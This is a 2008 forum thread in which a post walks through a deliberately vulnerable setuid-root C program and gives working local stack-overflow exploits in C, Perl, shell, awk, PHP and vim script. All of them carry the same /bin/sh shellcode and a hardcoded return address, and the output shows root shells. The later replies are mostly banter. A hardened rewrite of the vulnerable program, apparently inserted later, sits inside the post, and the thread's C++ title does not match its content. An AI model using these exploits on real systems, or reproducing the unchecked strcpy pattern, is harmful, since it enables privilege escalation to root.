exploit overflow with C++
doniskynet (Newbie)
Posts: 18, Join date: 14.05.08, Location: Skynet Corporation
Subject: exploit overflow with C++ Thu May 22, 2008 7:33 pm
Overflow exploits are not only compiled by C. Instead, they can be compiled by almost any programming language. The examples in this article are tested on Linux and demonstrated by overflow exploits compiled by C, Perl, Shell and Awk. The reason for this choice is that almost all these languages are bundled with Unix (except for C in commercial Unix systems).

In the following examples accurate location is implemented basically by placing SHELLCODE into environment variables.
<1> vul.c that is vulnerable to overflow

```
[cloud@test]$ id
uid=505(cloud) gid=503(test) groups=503(test)
[cloud@test]$ cat vul.c
/* Demo Have a bof vul at argv[1]. Write by watercloud @ xfocus.org */
#include<stdio.h>
int main(int argc,char * argv[])
{
    char buff[32];
    if(argc > 1)
    {
        strcpy(buff,argv[1]);
    }
    printf("buff : %s\n",buff);
    return 0;
}
[cloud@test]$ gcc vul.c -o vul
[cloud@test]$ ls -l vul
-rwxr-xr-x 1 cloud test 11627 2月 24 10:14 vul
[cloud@test]$ sudo chown root vul
[cloud@test]$ sudo chmod u+s vul
[cloud@test]$ ls -lh vul
-rwsr-xr-x 1 root test 11K 2月 24 10:14 vul
```
<2> C exploit ex.c

```
[cloud@test]$ cat ex.c
/* Demo for exploit bof of "./vul" Write by watercloud @ xfocus.org */
#include <stdio.h>
#define TARGET "./vul"
#define ADDR 0xbffff3e8
char SH[]="1\xc0PPP[YZ4\xd0\xcd\x80"
          "j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
int main(int argc,char * argv[])
{
    char env_buff[4000];
    char cmd_buff[1024];
    int i,ret;
    unsigned int *pi;
    char * pc;

    for(i=0;i<3096;env_buff[i++]=0x90){ };
    env_buff[i]='\0';
    strcat(env_buff,SH);
    setenv("KK",env_buff,1);
    strcpy(cmd_buff,TARGET);
    pc=&cmd_buff[strlen(TARGET)];
    *pc++=' ';
    for(ret=1,i=0;i<4 && ret;i++)
    {
        int j;
        *pc++='A';
        pi=(unsigned int *)pc;
        for(j=0;j<20;*pi++=ADDR,j++){};
        *pi=0;
        ret=system(cmd_buff);
    }
    return ret;
}
[cloud@test]$ gcc ex.c -o ex
[cloud@test]$ ./ex
buff : A[...]
buff : AA[...]
buff : AAA[...]
buff : AAAA[...]
sh-2.05b# id
uid=0(root) gid=503(test) groups=503(test)
sh-2.05b# exit
exit
```
<3> perl exploit ex.pl

```
[cloud@test]$ cat ex.pl
#!/usr/bin/perl
# Demo for exploit bof of "./vul"
# Write by watercloud @ xfocus.org
#$ENV_LEN=`env |wc -c`
$SHELL="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
$ENV{KK}= "\x90"x 3096 . $SHELL;
for($ret=1,$ag="AA",$i=0;$i<4 && $ret; $ag="A"x $i++)
{
    $ret=system "./vul",$ag. "\xff\xbf\xe8\xf3"x20; #ADDR:0xbffff3e8
}
#EOF
[cloud@test]$ perl ex.pl
buff : AA[...]
sh-2.05b# id
uid=0(root) gid=503(test) groups=503(test)
sh-2.05b# exit
exit
```
<4> Shell exploit ex.sh

```
[cloud@test]$ cat ex.sh
#!/bin/bash
# Demo for exploit bof of "./vul"
# Write by watercloud @ xfocus.org
#ENV_LEN=`env |wc -c|tr -d ' '`
SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
AG="AA";for (( i=0;i<10;i++));do AG=$AG$AG;done ;AG=$AG$AG$AG #3096
for((i=0;i<20;i++));do AD=$AD"\xff\xbf\xe8\xf3";done #ADDR:0xbffff3e8
export AGSHELL=$AG`echo -e $SH`
for((i=0;i<4;i++)) ;do
    AA=$AA"A"
    if ./vul $AA`echo -e $AD`
    then
        break
    fi
done
#EOF
[cloud@test]$ chmod a+x ex.sh
[cloud@test]$ ./ex.sh
buff : A[...]
./ex.sh: line 16: 5287 段错误 ./vul $AA`echo -e $AD`
buff : AA[...]
sh-2.05b# id
uid=0(root) gid=503(test) groups=503(test)
sh-2.05b# exit
exit
```
<5> awk exploit ex.awk

```
[cloud@test]$ cat ex.awk
# Demo for exploit bof of "./vul"
# Write by watercloud @ xfocus.org
BEGIN{
    SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
    AG="AA";
    for ( i=0;i<10;i++) { AG=AG""AG; }
    AG=AG""AG""AG #3096
    for(i=0;i<20;i++) {
        AD=AD"\xe8\xf3\xff\xbf"; #ADDR:0xbffff3e8
    }
    AA="AA"
    for(i=0;i<4;i++) {
        AA=AA"A"
        system("./vul "AA""AD" "AG""SH)
    }
}
#EOF
[cloud@test]$ gawk -f ex.awk /dev/null
buff : AAA[...]
buff : AAAA[...]
sh-2.05b# id
uid=0(root) gid=503(test) groups=503(test)
sh-2.05b#
```
<6> PHP exploit

```
[cloud@MagicLinux tmp]$ id
uid=502(cloud) gid=502(cloud) groups=502(cloud)
[cloud@MagicLinux tmp]$ ls -l vul
-rwsr-xr-x 1 root root 4895 2月 26 20:57 vul
[cloud@MagicLinux tmp]$ cat ex.php
<?php
$SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
$AG="AA";
for( $i=0;$i<10;$i++){ $AG.=$AG; }
$AG.=$AG.$AG; #3096
for($i=0;$i<20;$i++) {
    $AD.="\xff\xbf\xe8\xf3";#ADDR:0xbffff3e8
}
for($i=0;$i<4;$i++) {
    $AA.="A";
    print system("./vul ".$AA.$AD.$AG.$SH);
}
?>
[cloud@MagicLinux tmp]$ php ex.php 1>/dev/null
id >&2
uid=0(root) gid=502(cloud) groups=502(cloud)
exit
[cloud@MagicLinux tmp]$
```
<7> Vim extension script exploit

Even vim's extension scripting language can be used to write an overflow exploit.

```
[cloud@MagicLinux tmp]$ id
uid=502(cloud) gid=502(cloud) groups=502(cloud)
[cloud@MagicLinux tmp]$ cat ex.vim
let SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80"
let AG="AA"
let i=0
while(i<10)
    let AG=AG.AG
    let i=i+1
endwhile
let AG=AG.AG.AG "len of AG is 3096
let AD=""
let i=0
while(i<20)
    let AD=AD."\xff\xbf\xe8\xf3" "ADDR:0xbffff3e8
    let i=i+1
endwhile
let AA=""
let i=0
while(i<4)
    let AA=AA."A"
    execute "!./vul ". AA . AD . AG . SH
    let i=i+1
endwhile
[cloud@MagicLinux tmp]$ ls -l vul
-rwsr-xr-x 1 root root 4895 2月 26 20:57 vul
[cloud@MagicLinux tmp]$ vim -eS ex.vim
Xlib: connection to ":0.0" refused by server
Xlib: No protocol specified
buff : A[...]AAAA[...]
sh-2.05b# id
uid=0(root) gid=502(cloud) groups=502(cloud)
sh-2.05b#
```
<8> ......
<9> Summary

The basis of an overflow is address location, the use of data structures such as the heap, and the architecture the organization/OS is running on. Knowing these, we can understand that an overflow exploit itself is unrelated to the programming language.
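The root cause in vul.c above is the unchecked strcpy() into a 32-byte stack buffer. The following bounds-checked counterpart is an added example, not code from the original post or from watercloud; it keeps the page's 32-byte buffer and the names copy_arg and run are mine.

```c
#include <stdio.h>
#include <string.h>

#define BUFF_SIZE 32   /* same stack buffer size as vul.c above */

/* Bounded replacement for the unchecked strcpy() in vul.c.
 * Returns 0 and fills dst when src (plus its terminator) fits;
 * returns -1 and leaves dst empty otherwise, so an overlong
 * argv[1] can never write past the end of the stack buffer. */
int copy_arg(char *dst, size_t dst_size, const char *src)
{
    size_t n = 0;

    if (dst == NULL || dst_size == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;
    /* Scan at most dst_size bytes: a huge or unterminated source
     * is rejected without being read any further. */
    while (n < dst_size && src[n] != '\0')
        n++;
    if (n >= dst_size)          /* no room left for the NUL */
        return -1;
    memcpy(dst, src, n + 1);    /* n + 1 copies the terminator too */
    return 0;
}

/* Hardened equivalent of vul.c's main(): identical output for
 * arguments of up to 31 bytes, a clean error instead of a
 * corrupted stack for anything longer. Returns the exit status. */
int run(int argc, char *argv[])
{
    char buff[BUFF_SIZE] = "";

    if (argc > 1 && copy_arg(buff, sizeof buff, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUFF_SIZE - 1);
        return 1;
    }
    printf("buff : %s\n", buff);
    return 0;
}

int main(int argc, char *argv[])
{
    return run(argc, argv);
}
```

Building with `gcc -O2 -fstack-protector-strong -D_FORTIFY_SOURCE=2` adds compiler-side instrumentation as a second layer, but the length check is what actually removes the bug.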
cr4wl3r (I'am Not Hacker)
Posts: 373, Join date: 18.04.08, Age: 38, Location: In Your Mind
Subject: Re: exploit overflow with C++ Tue Jun 10, 2008 8:21 am

This is what we've been looking for all along, thanks bro
bL4Ck_3n91n3 (MotherFucker!?)
Posts: 568, Join date: 18.04.08
Subject: Re: exploit overflow with C++ Tue Jun 10, 2008 10:08 pm

What is that even for? Sorry, I'm a newbie... the language looks weird...
s4va (Lamer)
Posts: 60, Join date: 18.04.08, Age: 37, Location: in the heart of each of His followers
Subject: Re: exploit overflow with C++ Tue Jun 10, 2008 11:31 pm
cr4wl3r (I'am Not Hacker)
Posts: 373, Join date: 18.04.08, Age: 38, Location: In Your Mind
Subject: Re: exploit overflow with C++ Wed Jun 11, 2008 6:24 am

That was made with C++; to master it you need to know at least C++ and assembly
bL4Ck_3n91n3 (MotherFucker!?)
Posts: 568, Join date: 18.04.08
Subject: Re: exploit overflow with C++ Wed Jun 11, 2008 6:43 am
exnome (Script Kiddies)
Posts: 157, Join date: 15.05.08, Age: 38, Location: Behind the Proxy
Subject: Re: exploit overflow with C++ Thu Jun 12, 2008 12:14 am

Here's how you use it:

Code:
```
1. vul.c that is vulnerable to overflow
[cloud@test]$ gcc vul.c -o vul
[cloud@test]$ ls -l vul
-rwxr-xr-x 1 cloud test 11627 2月 24 10:14 vul
[cloud@test]$ sudo chown root vul
[cloud@test]$ sudo chmod u+s vul
[cloud@test]$ ls -lh vul
-rwsr-xr-x 1 root test 11K 2月 24 10:14 vul

2. C exploit ex.c
[cloud@test]$ gcc ex.c -o ex
[cloud@test]$ ./ex

3. perl exploit ex.pl
[cloud@test]$ perl ex.pl

4. Shell exploit ex.sh
[cloud@test]$ chmod a+x ex.sh
[cloud@test]$ ./ex.sh

5. awk exploit ex.awk
[cloud@test]$ gawk -f ex.awk /dev/null

6. PHP exploit
[cloud@MagicLinux tmp]$ php ex.php 1>/dev/null
id >&2
uid=0(root) gid=502(cloud) groups=502(cloud)
exit
[cloud@MagicLinux tmp]$

7. Vim extension script exploit
[cloud@MagicLinux tmp]$ ls -l vul
-rwsr-xr-x 1 root root 4895 2月 26 20:57 vul
[cloud@MagicLinux tmp]$ vim -eS ex.vim
```
EA Ngel (Lamer)
Posts: 53, Join date: 13.05.08
Subject: Re: exploit overflow with C++ Thu Jul 03, 2008 4:23 am

Reminds me of Xnuser's hacking technique
rezagms (Newbie)
Posts: 42, Join date: 27.06.08, Location: GadA
Subject: donie copy-paste >.< Sat Jul 12, 2008 5:06 pm

The copy-[paste] move
Hoa Hoa Hoa Hoaeeemmm... >,<
d3w0 (Lamer)
Posts: 55, Join date: 03.05.08
Subject: Re: exploit overflow with C++ Sun Jul 13, 2008 10:21 am

Whoa, these guys are masters..... scared............. run awaaaay
funky_shensey (Admin)
Posts: 356, Join date: 07.05.08, Location: gorontalo
Subject: Re: exploit overflow with C++ Sun Jul 13, 2008 10:37 am

Ugh, what kind of master stuff is that, it's totally confusing
cYb3r_jOk3 (Script Kiddies)
Posts: 232, Join date: 12.05.08, Age: 36, Location: mAlaNk jAWatiMUr
Subject: Re: exploit overflow with C++ Mon Jul 14, 2008 3:40 am
exnome (Script Kiddies)
Posts: 157, Join date: 15.05.08, Age: 38, Location: Behind the Proxy
Subject: Re: exploit overflow with C++ Sun Jul 20, 2008 6:41 pm
funky_shensey (Admin)
Posts: 356, Join date: 07.05.08, Location: gorontalo
Subject: Re: exploit overflow with C++ Mon Jul 21, 2008 4:43 am
exnome (Script Kiddies)
Posts: 157, Join date: 15.05.08, Age: 38, Location: Behind the Proxy
Subject: Re: exploit overflow with C++ Mon Jul 21, 2008 9:08 pm
saint (Script Kiddies)
Posts: 157, Join date: 22.05.08, Age: 39, Location: Eastern Hell
Subject: Re: exploit overflow with C++ Thu Aug 28, 2008 12:06 am

Damn, I've got a C++ tutorial CD right here, but to this very second I still don't get it